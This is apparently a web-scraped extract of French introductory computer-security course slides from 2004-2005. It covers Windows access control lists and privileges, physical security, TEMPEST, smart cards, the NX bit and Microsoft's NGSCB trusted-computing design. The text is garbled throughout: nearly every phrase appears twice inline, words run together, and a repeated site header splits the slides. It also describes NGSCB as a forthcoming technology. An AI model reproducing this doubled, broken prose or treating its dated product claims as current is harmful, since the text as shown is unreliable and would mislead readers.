((System ACLSystem ACL)) L’L’OwnerOwner (propriétaire) de l’objet (propriétaire) de l’objet

A toujours la possibilité de changer les A toujours la possibilité de changer les permissionspermissions

Le Le Primary GroupPrimary Group du propriétaire du propriétaire

Security Descriptor

Header

Owner SID

Group SID

DACL

SACL

ACEs

ACEs

Page 145: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Droits des comptes et privilègesDroits des comptes et privilègesIl y a de nombreuses opérations effectuées par Il y a de nombreuses opérations effectuées par les processus qui ne peuvent pas être les processus qui ne peuvent pas être autorisées à travers la protection des objets car autorisées à travers la protection des objets car elles n’impliquent pas d’interaction avec un objet elles n’impliquent pas d’interaction avec un objet particulierparticulier Par exemple, la possibilité de passer outre les Par exemple, la possibilité de passer outre les

contrôles de sécurité quand on ouvre les fichiers pour contrôles de sécurité quand on ouvre les fichiers pour un sauvegarde n’est pas l’attribut d’un objet mais d’un un sauvegarde n’est pas l’attribut d’un objet mais d’un comptecompte

Windows utilise à la fois les Windows utilise à la fois les privilègesprivilèges et les et les droits des comptesdroits des comptes pour permettre à pour permettre à l’administrateur système de contrôler quels l’administrateur système de contrôler quels comptes peuvent effectuer quelles opérations comptes peuvent effectuer quelles opérations relatives à la sécuritérelatives à la sécurité

Page 146: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Droits des comptes et privilègesDroits des comptes et privilègesUn Un privilègeprivilège est la permission pour un est la permission pour un compte d’effectuer une opération système compte d’effectuer une opération système particulière telle que déclencher un arrêt particulière telle que déclencher un arrêt du systèmedu systèmeLe Le droit d’un comptedroit d’un compte ( (User RightUser Right) autorise ) autorise ou dénie au compte auquel il a été affecté ou dénie au compte auquel il a été affecté la possibilité de réaliser un type particulier la possibilité de réaliser un type particulier de de logonlogon ( (local, interactive,…local, interactive,…) sur une ) sur une machinemachine

Page 147: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Module 2Module 2Sécurité des systèmesSécurité des systèmes

2C - Aperçu d’architectures 2C - Aperçu d’architectures matériellesmatérielles

Page 148: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

La sécurité physiqueLa sécurité physiqueLes menaces sont multiples :Les menaces sont multiples :

BâtimentsBâtiments Observation à distanceObservation à distance Entrée ou sortie non autoriséeEntrée ou sortie non autorisée

Zones sensiblesZones sensibles Accès non autorisé à des machines sensiblesAccès non autorisé à des machines sensibles Récupération du contenu des poubellesRécupération du contenu des poubelles

CâblageCâblage Installation de systèmes d’écouteInstallation de systèmes d’écoute Sabotage de l’infrastructureSabotage de l’infrastructure

MatérielMatériel Vol de machine ou de disque durVol de machine ou de disque dur Installation de Installation de rootkitrootkit ou de logiciel indésirable ou de logiciel indésirable Création de compte secondaireCréation de compte secondaire Vol de données, de clés ou de mot de passeVol de données, de clés ou de mot de passe

Sans un minimum de sécurité physique, la sécurité logique Sans un minimum de sécurité physique, la sécurité logique diminue, voire cesse d’existerdiminue, voire cesse d’exister

Page 149: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les signaux compromettantsLes signaux compromettantsLes écrans, les processeurs, les câbles,… sans Les écrans, les processeurs, les câbles,… sans parler du Wi-Fi, de l’infrarouge ou de Bluetooth parler du Wi-Fi, de l’infrarouge ou de Bluetooth émettent un rayonnement électromagnétique qui émettent un rayonnement électromagnétique qui peut être écouté !peut être écouté !TEMPEST - TEMPEST - Telecommunications Electronics Telecommunications Electronics Material Protected From Emanating Spurious Material Protected From Emanating Spurious TransmissionsTransmissions Machines ayant fait l’objet de Machines ayant fait l’objet de recherches avancées en Compatibilité Electro recherches avancées en Compatibilité Electro Magnétique (CEM) pour limiter leur bruit Magnétique (CEM) pour limiter leur bruit électromagnétique de telle sorte qu’elle ne électromagnétique de telle sorte qu’elle ne puissent pas être espionnées, passée une puissent pas être espionnées, passée une certaine distancecertaine distance

Page 150: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Les signaux compromettantsLes signaux compromettantsS’applique aux machines, coûteux S’applique aux machines, coûteux et réglementéet réglementéAlternativesAlternatives Bruit blanc : spectre uniforme de Bruit blanc : spectre uniforme de

signaux électriques aléatoiressignaux électriques aléatoires Zones : appliquer le principe de Zones : appliquer le principe de

protection aux pièces voire même protection aux pièces voire même aux bâtiments (construits comme aux bâtiments (construits comme des cages de Faraday)des cages de Faraday)

Page 151: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cartes à puceCartes à pucePeuvent être crypto ou nonPeuvent être crypto ou nonOnt des capacités grandissantes de Ont des capacités grandissantes de stockage (128 ko) et de CPUstockage (128 ko) et de CPUPeuvent être avec contact ou sans Peuvent être avec contact ou sans (alimentation par induction et transmission (alimentation par induction et transmission d’infos par ondes)d’infos par ondes)La plus grande difficulté lors du La plus grande difficulté lors du déploiement des cartes à puce est de les déploiement des cartes à puce est de les personnaliser puis de les distribuer personnaliser puis de les distribuer correctement…correctement…

Page 152: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cartes à puceCartes à puceOffrent un bon moyen de protection des clésOffrent un bon moyen de protection des clésOu bien non ?Ou bien non ?Une carte influence son environnement :Une carte influence son environnement : Temps de réponseTemps de réponse Consommation électriqueConsommation électrique Émissions électromagnétiquesÉmissions électromagnétiques

Et elle est influencée par son environnement :Et elle est influencée par son environnement : TempératureTempérature AlimentationAlimentation

Page 153: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Carte à puceCarte à puceDifferential Power AnalysisDifferential Power Analysis

Page 154: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Cartes crypto accélératricesCartes crypto accélératricesEmbarquent un processeur dédié pour Embarquent un processeur dédié pour décharger la machine de tâches de crypto (type décharger la machine de tâches de crypto (type SSL), un générateur hardware de nombres SSL), un générateur hardware de nombres aléatoiresaléatoiresD’autres équipements appelés HSM (D’autres équipements appelés HSM (Hardware Hardware Security ModulesSecurity Modules) permettent le stockage de ) permettent le stockage de clés de manière sécuriséeclés de manière sécuriséeTous ces équipements contiennent des secrets Tous ces équipements contiennent des secrets (clé privée associé au certificat du site Web par (clé privée associé au certificat du site Web par ex.) et proposent donc des mécanismes de ex.) et proposent donc des mécanismes de protection de la cléprotection de la clé peuvent détruire leur contenu en cas de détection peuvent détruire leur contenu en cas de détection

d’anomalie grave (tentative d’ouverture du boîtier d’anomalie grave (tentative d’ouverture du boîtier scellé, température anormale, tension…)scellé, température anormale, tension…)

Page 155: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Innovations dans les CPUInnovations dans les CPUNX (NX (No ExecuteNo Execute)) Nouvelle technologie avec attribut marquant qu’aucun Nouvelle technologie avec attribut marquant qu’aucun

code ne devrait être exécuté depuis cette partie de la code ne devrait être exécuté depuis cette partie de la mémoiremémoire

Si on tente d’exécuter du code depuis une page Si on tente d’exécuter du code depuis une page mémoire ayant le bit NX activé, le processeur lève mémoire ayant le bit NX activé, le processeur lève une exception, interprétée par l’OSune exception, interprétée par l’OS

Toute mémoire virtuelle peut être marquée avec le bit Toute mémoire virtuelle peut être marquée avec le bit NXNX

Pour l’utiliser, il faut un processeur avec NX et Pour l’utiliser, il faut un processeur avec NX et un OS supportant NX un OS supportant NX Existe dans les AMD64, les Itanium et Existe dans les AMD64, les Itanium et maintenant dans les cœurs maintenant dans les cœurs PrescottPrescott

Page 156: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Innovations dans les CPUInnovations dans les CPUFonctionne en mode noyau et en mode Fonctionne en mode noyau et en mode utilisateurutilisateurProtège la pile (Protège la pile (stackstack), le tas (), le tas (heapheap) et ) et d’autres zones mémoiresd’autres zones mémoiresPeut mener à un déni de servicePeut mener à un déni de service

Page 157: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Le PC aujourd’huiLe PC aujourd’hui

Jeux

Pilote Pilote Pilote

Virus

Système d’exploitationCheval de Troie

ApplicationApplication““sécurisée”sécurisée”

P2P / Chat(avec backdoor)

Application plus sécurisée

Attaque

Attaque

Attaque Réseau

FausseDLL

système

Attaque

Mode utilisateu

r

Mode noyau

Page 158: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

NGSCBNGSCBObjectif poursuivi : protéger le logiciel du Objectif poursuivi : protéger le logiciel du logiciellogicielPermet de mettre en service et de Permet de mettre en service et de protéger un protéger un Trusted Computing BaseTrusted Computing Base (TCB) décentralisé dans le cadre de (TCB) décentralisé dans le cadre de systèmes « ouverts »systèmes « ouverts »

Page 159: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

NGSCBNGSCBProjet de Microsoft en collaboration avec Projet de Microsoft en collaboration avec d’autres industriels (dont AMD et Intel)d’autres industriels (dont AMD et Intel)Ensemble de mécanismes Ensemble de mécanismes Isolation du logiciel (mémoire cloisonnée – Isolation du logiciel (mémoire cloisonnée –

établissement du TCB)établissement du TCB) Authentification du logiciel (attestation - Authentification du logiciel (attestation -

extension du TCB)extension du TCB) Secrets pour le logiciel (stockage scellé – Secrets pour le logiciel (stockage scellé –

persistance de l’état du TCB)persistance de l’état du TCB) Entrées et sorties sécurisées (échanges Entrées et sorties sécurisées (échanges

« dignes de confiance » pour l’utilisateur)« dignes de confiance » pour l’utilisateur)

Page 160: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ArchitectureArchitecture

Main OSMain OS

USBUSB DriverDriver

Nexus-Mode (RHS)Nexus-Mode (RHS)

NexusNexus

NexusMgr.sysNexusMgr.sys

HALHAL

NALNAL

SSCSSC

User Apps.User Apps.

AgentAgent

NCA Runtime LibraryNCA Runtime Library

Trusted UserTrusted UserEngine (TUE)Engine (TUE)

TSPTSP TSPTSP TSPTSP

AgentAgentAgentAgent

Standard-Mode (LHS)Standard-Mode (LHS)

UserUser

KernelKernel

HardwareHardware Secure InputSecure Input ChipsetChipsetCPUCPUSecure VideoSecure Video

Page 161: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Qu’est-ce que le Qu’est-ce que le nexusnexus fournit à ses NCA ? fournit à ses NCA ?

Un environnement d’exécution séparé Un environnement d’exécution séparé protégéprotégé pour les applications pour les applications (NCA)(NCA) Les NCA peuventLes NCA peuvent Etre autonomesEtre autonomes Fournir des services aux applicationsFournir des services aux applicationsLe propriétaire indique au Le propriétaire indique au nexusnexus quelles NCA quelles NCA autorisées à s’exécuter (la politique d’exécution autorisées à s’exécuter (la politique d’exécution du du nexusnexus utilise les identités des NCA) utilise les identités des NCA)Le Le nexus nexus scelle les secrets pour tout NCA et scelle les secrets pour tout NCA et peut « attester » de l’identité du NCApeut « attester » de l’identité du NCA

Page 162: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Qu’est-ce que le Qu’est-ce que le nexusnexus fournit à ses NCA ? fournit à ses NCA ?

Fournit des services OS simples : Fournit des services OS simples : threadsthreads, mémoire, , mémoire, IPC, E/S dignes de confiances, accès aux services de la IPC, E/S dignes de confiances, accès aux services de la partie gauche du schéma précédent (mode standard)partie gauche du schéma précédent (mode standard)Le Le nexusnexus gère l’environnement de sécurité gère l’environnement de sécurité Certains matériles restreindront le Certains matériles restreindront le nexusnexus qui peut qui peut s’exécuters’exécuter

Le BIOS/le propriétaire peut changer la liste de Le BIOS/le propriétaire peut changer la liste de nexusnexus autorisés autorisés Seul un Seul un nexusnexus privilégié peut modifier la liste des privilégié peut modifier la liste des nexusnexus

autorisés à s’exécuterautorisés à s’exécuterUn logiciel quelconque ne le peut pasUn logiciel quelconque ne le peut pas

NexusNexus monolithique (pas de code enfichable) monolithique (pas de code enfichable)

Page 163: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèle de menacesModèle de menacesModèle de menacesModèle de menaces AUCUNE attaque de logiciel (venant du Web, AUCUNE attaque de logiciel (venant du Web,

e-mail) ne doit réussir contre les opérations e-mail) ne doit réussir contre les opérations réalisées dans l’espace du réalisées dans l’espace du nexusnexus (ceci ne (ceci ne concerne pas les concerne pas les firmwaresfirmwares, cartes , cartes adaptateurs, …)adaptateurs, …)

Protection de la confidentialitéProtection de la confidentialitéDisponibilité non protégée (suppression des Disponibilité non protégée (suppression des fichiers par ex.)fichiers par ex.)

AUCUNE attaque de type AUCUNE attaque de type Break-Once/Break-Everywhere (BOBE) Break-Once/Break-Everywhere (BOBE) ne doit être possiblene doit être possible

Page 164: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Sécurité au sein de NGSCBSécurité au sein de NGSCBIdentité du codeIdentité du codeIdentité du sujetIdentité du sujetStockage scelléStockage scelléAuthentification à distanceAuthentification à distanceChemin sécurisé vers et depuis l’utilisateurChemin sécurisé vers et depuis l’utilisateur

Tout ceci relié ensemble de manière cohérente Tout ceci relié ensemble de manière cohérente par une politique de sécurité systèmepar une politique de sécurité système

Page 165: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Identité du codeIdentité du codeNormalement l’utilisateur se connecte au système Normalement l’utilisateur se connecte au système (log-on)(log-on) Avec NGSCB, le code se connecte au système (avec Avec NGSCB, le code se connecte au système (avec

ou sans un utilisateur) ou sans un utilisateur) Identité du codeIdentité du code Le Le nexusnexus est connu par son condensé est connu par son condensé Les Les Nexus Computing AgentsNexus Computing Agents (NCA) sont connus par (NCA) sont connus par

leurs condensésleurs condensés Architecture en coucheArchitecture en coucheD’où la notion essentielle et clé de « l’identité du D’où la notion essentielle et clé de « l’identité du processus »processus »

Page 166: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Identité du sujetIdentité du sujet

Identité du sujetIdentité du sujet Identité de l’utilisateur + Identité du codeIdentité de l’utilisateur + Identité du codeForme la base d’un modèle de sécuritéForme la base d’un modèle de sécurité Un utilisateur authentifié donné (utilisant Un utilisateur authentifié donné (utilisant

n’importe quel système d’authentification n’importe quel système d’authentification d’utilisateurs)…d’utilisateurs)…

……Exécutant un code donné dont l’identité est Exécutant un code donné dont l’identité est connue (ce qui comprend le certificat de la carte connue (ce qui comprend le certificat de la carte mère, l’identité du mère, l’identité du nexus nexus et l’identité du NCA)…et l’identité du NCA)…

……Est autorisé à accéder une ressourceEst autorisé à accéder une ressource

Page 167: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

AttestationAttestation

Technologie d’attestationTechnologie d’attestation L’identité du L’identité du Security Support ComponentSecurity Support Component (SSC) est (SSC) est

signée par l’OEMsignée par l’OEM Le Le nexusnexus peut être authentifié au moyen d’un peut être authentifié au moyen d’un

processus de chiffrement en coopérant avec le processus de chiffrement en coopérant avec le hardware (le condensé du hardware (le condensé du nexusnexus est signé par le SSC) est signé par le SSC)

Le Le nexusnexus peut fournir un service similaire aux agents peut fournir un service similaire aux agents

L’attestation concerné l’identitéL’attestation concerné l’identité Le propriétaire décide s’il « fait confiance » à un Le propriétaire décide s’il « fait confiance » à un nexusnexus Le propriétaire décide s’il « fait confiance » à un agentLe propriétaire décide s’il « fait confiance » à un agent

Page 168: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Chemin sécurisé vers l’utilisateurChemin sécurisé vers l’utilisateur

Sécurise le canal d’entréeSécurise le canal d’entrée ClavierClavier SourisSouris

Sécurise le canal de sortieSécurise le canal de sortie VidéoVidéo

Sécurise la fenêtre d’entréeSécurise la fenêtre d’entrée Trusted User interface EngineTrusted User interface Engine (TUE) (TUE)

Page 169: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Maintenir les données privées –Stockage scelléMaintenir les données privées –Stockage scelléPermet à une configuration logicielle de Permet à une configuration logicielle de maintenir des secrets pendant une durée maintenir des secrets pendant une durée significativesignificative Chiffre les donnéesChiffre les données Retourne les données déchiffrées si et seulement si Retourne les données déchiffrées si et seulement si

l’identité du code correspondl’identité du code correspond Fait correspondre les secrets au logiciel (identité du Fait correspondre les secrets au logiciel (identité du

code)code) Fait correspondre les secrets au logiciel + utilisateur Fait correspondre les secrets au logiciel + utilisateur

(identité du sujet)(identité du sujet)Technologie de chiffrementTechnologie de chiffrement Le Le nexusnexus peut sceller des secrets à lui-même peut sceller des secrets à lui-même

Page 170: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Calcul de l’identité du codeCalcul de l’identité du code

L’identité du code est un concept cléL’identité du code est un concept clé Valeur stockée dans un registre hardwareValeur stockée dans un registre hardware

L’identité du L’identité du nexusnexus est enregistrée par le est enregistrée par le SSCSSCPositionné pendant le « boot » du Positionné pendant le « boot » du nexusnexus Ne peut pas être positionné de manière Ne peut pas être positionné de manière

arbitrairearbitraire

Au niveau du hardware l’identité du logiciel Au niveau du hardware l’identité du logiciel est un simple est un simple hashhash Une valeur stockée dans un registreUne valeur stockée dans un registre

Page 171: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Authentification du codeAuthentification du codeLe butLe but Le Le loaderloader sait ce qu’il charge – l’identité du code sait ce qu’il charge – l’identité du code La politique système définie l’ensemble des identités La politique système définie l’ensemble des identités

de sujets (user-id, code-id) qui peuvent être chargéesde sujets (user-id, code-id) qui peuvent être chargées Le code n’a Le code n’a pas pas besoin d’être signé pour s’exécuter besoin d’être signé pour s’exécuter

sur le systèmesur le systèmeSemblable au calcul du condensé du Semblable au calcul du condensé du nexusnexus par le par le hardware mais plus flexiblehardware mais plus flexible

Page 172: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Respect de la vie privéeRespect de la vie privéeNGSCB permet un meilleur respect de la vie privéeNGSCB permet un meilleur respect de la vie privée

Protection des informations personnellesProtection des informations personnelles L’utilisateur peut décider à quel identité de code il veut divulguer L’utilisateur peut décider à quel identité de code il veut divulguer

des informations personnelles à travers le mécanisme des informations personnelles à travers le mécanisme d’attestation de l’entité distanted’attestation de l’entité distante

La sécurisation du canal d’entrées-sorties rend plus difficile La sécurisation du canal d’entrées-sorties rend plus difficile d’écrire des intercepteurs (clavier et graphique)d’écrire des intercepteurs (clavier et graphique)

On ne peut voler les disques et s’en aller avec des secretsOn ne peut voler les disques et s’en aller avec des secrets• MAIS le SSC contient des clés uniquesMAIS le SSC contient des clés uniques

• On a besoin de protéger les utilisateurs / restreindre l’utilisation On a besoin de protéger les utilisateurs / restreindre l’utilisation des données permettant d’identifier la machinedes données permettant d’identifier la machine

• « Virtualiser » la clé« Virtualiser » la clé

Page 173: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Accès du hardware à la clé Accès du hardware à la clé publiquepublique

• Approche en couche :Approche en couche :• Le hardware (HW) doit être sous tensionLe hardware (HW) doit être sous tension• Le HW peut être mis hors tensionLe HW peut être mis hors tension• Le HW ne peut donner la clé qu’à un logiciel digne de Le HW ne peut donner la clé qu’à un logiciel digne de

confianceconfiance(seul le propriétaire a le droit de changer cela)(seul le propriétaire a le droit de changer cela)

• Le Le nexus nexus de Microsoft :de Microsoft :• Ne fournit les clés/certificats HW qu’à des tiers Ne fournit les clés/certificats HW qu’à des tiers

certifiés/dignes de confiancecertifiés/dignes de confiance• Identity Service ProvidersIdentity Service Providers

• Ces tiers émettent des clés de second niveauCes tiers émettent des clés de second niveau• Identity KeysIdentity Keys

Page 174: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Modèles de respect de la vie privéeModèles de respect de la vie privéeNe rien dire à personneNe rien dire à personne Fonctionne localement ; pas de confiance distribuéeFonctionne localement ; pas de confiance distribuée

Identity Service ProviderIdentity Service Provider Utilise un tiers pour la preuve de l’identitéUtilise un tiers pour la preuve de l’identité

Preuve Directe (DP – Preuve Directe (DP – Direct ProofDirect Proof)) Prouve l’identité directement sans révéler une Prouve l’identité directement sans révéler une

information uniqueinformation unique

L’utilisateur décide laquelle de ces politiques il L’utilisateur décide laquelle de ces politiques il préfère – il peut les utiliser toutes ou certaines préfère – il peut les utiliser toutes ou certaines en combinaisonen combinaison

Page 175: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Zero Knowledge ProofZero Knowledge Proof (ZK) (ZK)ExplicationExplication Grotte avec 3 couloirs reliés les uns aux Grotte avec 3 couloirs reliés les uns aux

autres par une porte fermé à cléautres par une porte fermé à clé

Page 176: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Preuve directePreuve directeZero Knowledge ProofZero Knowledge Proof (ZK) (ZK) Prouve que le système a la connaissance de Prouve que le système a la connaissance de

quelque chose d’importantquelque chose d’importantNe révèle pas l’élément précis de cette Ne révèle pas l’élément précis de cette connaissanceconnaissance

Direct ProofDirect Proof (DP) (DP) Une preuve ZK qui prouve l’association entre Une preuve ZK qui prouve l’association entre

un SSC et la clé d’attestation d’identité de un SSC et la clé d’attestation d’identité de l’application (AIKl’application (AIK – Attestation Identity Key – Attestation Identity Key))

Ne révèle pas l’identité d’un SSC spécifiqueNe révèle pas l’identité d’un SSC spécifique

Page 177: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Le processus de preuve directeLe processus de preuve directeDans une preuve directe, la plateforme atteste Dans une preuve directe, la plateforme atteste de son identité en prouvant qu’il a une de son identité en prouvant qu’il a une « connaissance » unique qu’il est le seul à « connaissance » unique qu’il est le seul à pouvoir « savoir »pouvoir « savoir » Le propriétaire autorise NGSCB à attester de celaLe propriétaire autorise NGSCB à attester de cela Peut être utilisé dans un modèle P2PPeut être utilisé dans un modèle P2P

Les deux plates-formes se valident mutuellementLes deux plates-formes se valident mutuellementCeci établit une session qui utilise une identitéCeci établit une session qui utilise une identité

L’identité en question dépend du service et des besoinsL’identité en question dépend du service et des besoins

Page 178: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Composants matérielsComposants matérielsProcesseurProcesseurContrôleur mémoire/Contrôleur mémoire/ChipsetChipsetCoprocesseur de sécurité/de chiffrementCoprocesseur de sécurité/de chiffrementComplémentsCompléments Clavier, sourisClavier, souris Sortie vidéoSortie vidéo Autres périphériques (biométrie, etc.)Autres périphériques (biométrie, etc.)CertificatsCertificats

Page 179: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

ProcesseurProcesseurFournit les éléments nécessaires pour une protection de Fournit les éléments nécessaires pour une protection de la mémoire avec une granularité au niveau de la page la mémoire avec une granularité au niveau de la page (« mémoire cloisonnée »)(« mémoire cloisonnée »)Trusted ModeTrusted Mode et et Normal ModeNormal Mode Certains privilèges Certains privilèges kernel kernel peuvent être supprimés du ring-peuvent être supprimés du ring-

00 Trusted mode Trusted mode

Accès à toute la mémoireAccès à toute la mémoireContrôle complet du processeurContrôle complet du processeur

Normal modeNormal modeCertains pages sont inaccessibles, Certains pages sont inaccessibles, read-onlyread-only, etc., etc.Les changements de mode sensibles pour la sécurité (etc.) génèrent Les changements de mode sensibles pour la sécurité (etc.) génèrent une « faute »une « faute »

Page 180: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

SSC : SSC : Security Support Security Support ComponentComponent

Penser à « une carte à puce soudée sur la carte mère »Penser à « une carte à puce soudée sur la carte mère »ContientContient Au moins une clé AES et une paire de clés RSAAu moins une clé AES et une paire de clés RSA

Ces clés AES & les clés privées RSA ne quittent Ces clés AES & les clés privées RSA ne quittent jamaisjamais le chip le chip Des registres : le PCR (Des registres : le PCR (platform configuration registerplatform configuration register) qui ) qui

contient le condensé du contient le condensé du nexusnexus en cours d’exécution en cours d’exécutionLe Le nexusnexus n’a pas besoin d’être chargé lors du n’a pas besoin d’être chargé lors du bootboot ; il ; il peut être chargé plus tardpeut être chargé plus tard

Tout ce dont a besoin NGSCB est le condensé du Tout ce dont a besoin NGSCB est le condensé du nexusnexusCeci peut survenir à n’importe quel moment après le Ceci peut survenir à n’importe quel moment après le boot boot de la machine ; donc, quand on de la machine ; donc, quand on boote boote le le nexus nexus on hache on hache le le nexus nexus et on place la valeur de ce hash dans le PCRet on place la valeur de ce hash dans le PCR

Le SSC est EN FAIT la version 1.2 du TPM de Le SSC est EN FAIT la version 1.2 du TPM de TCPA (maintenant TCG)TCPA (maintenant TCG)

Page 181: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

La chaîne de certificatsLa chaîne de certificatsNGSCB s’appuie sur une chaîne de signatures numériques pour NGSCB s’appuie sur une chaîne de signatures numériques pour valider l’intégrité de la plate-formevalider l’intégrité de la plate-formeUne plate-forme NGSCB inclura les signatures de la plupart ou de Une plate-forme NGSCB inclura les signatures de la plupart ou de la totalité des acteurs de la phase de production, notammentla totalité des acteurs de la phase de production, notamment

Un tiers de confiance, certifiant le fabricant du SSCUn tiers de confiance, certifiant le fabricant du SSC Le fabricant du SSC, certifiant que le SSC est digne de confianceLe fabricant du SSC, certifiant que le SSC est digne de confiance L’assembleur de la carte mère, certifiant l’assemblage du SSC sur une L’assembleur de la carte mère, certifiant l’assemblage du SSC sur une

carte mère autoriséecarte mère autorisée Le fabricant OEM du système, certifiant que la chaîne d’assemblage de Le fabricant OEM du système, certifiant que la chaîne d’assemblage de

la carte mère est intactela carte mère est intacteCes certificats seront ajoutés à la plate-forme via du matériel Ces certificats seront ajoutés à la plate-forme via du matériel sécurisé (lui-même probablement fondé sur NGSCB)sécurisé (lui-même probablement fondé sur NGSCB)

Les tiers auront ainsi la certitude d’avoir affaire à un véritable système Les tiers auront ainsi la certitude d’avoir affaire à un véritable système NGSCB dans lequel ils peuvent avoir toute confiance, et non à une NGSCB dans lequel ils peuvent avoir toute confiance, et non à une imitationimitation

Page 182: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Un scénario en entrepriseUn scénario en entrepriseConnexion à distanceConnexion à distance

ApplicationPresentationSession

Transport

Network

Datalink

Physical

ApplicationPresentation

Session

Transport

Network

Datalink

Physical

Application habituelle d’aujourd’hui : vulnérableVPN : adéquat pour la couche réseau et en dessous ; tout ce qui est au-dessus est vulnérableApplication NGSCB : étend la passerelle au-delà de ce que permet le VPN ; maintenant toutes les couches sont protégées

Page 183: Initiation à la sécurité des systèmes et réseauxentrepotforall.free.fr/Cours%202004-2005/S… · PPT file · Web view · 2005-04-17Cours d’ initiation à la sécurité informatique,

Applications Applications Applications collaborativesApplications collaboratives Jeux multi-joueursJeux multi-joueurs NégociationsNégociations EnchèresEnchères

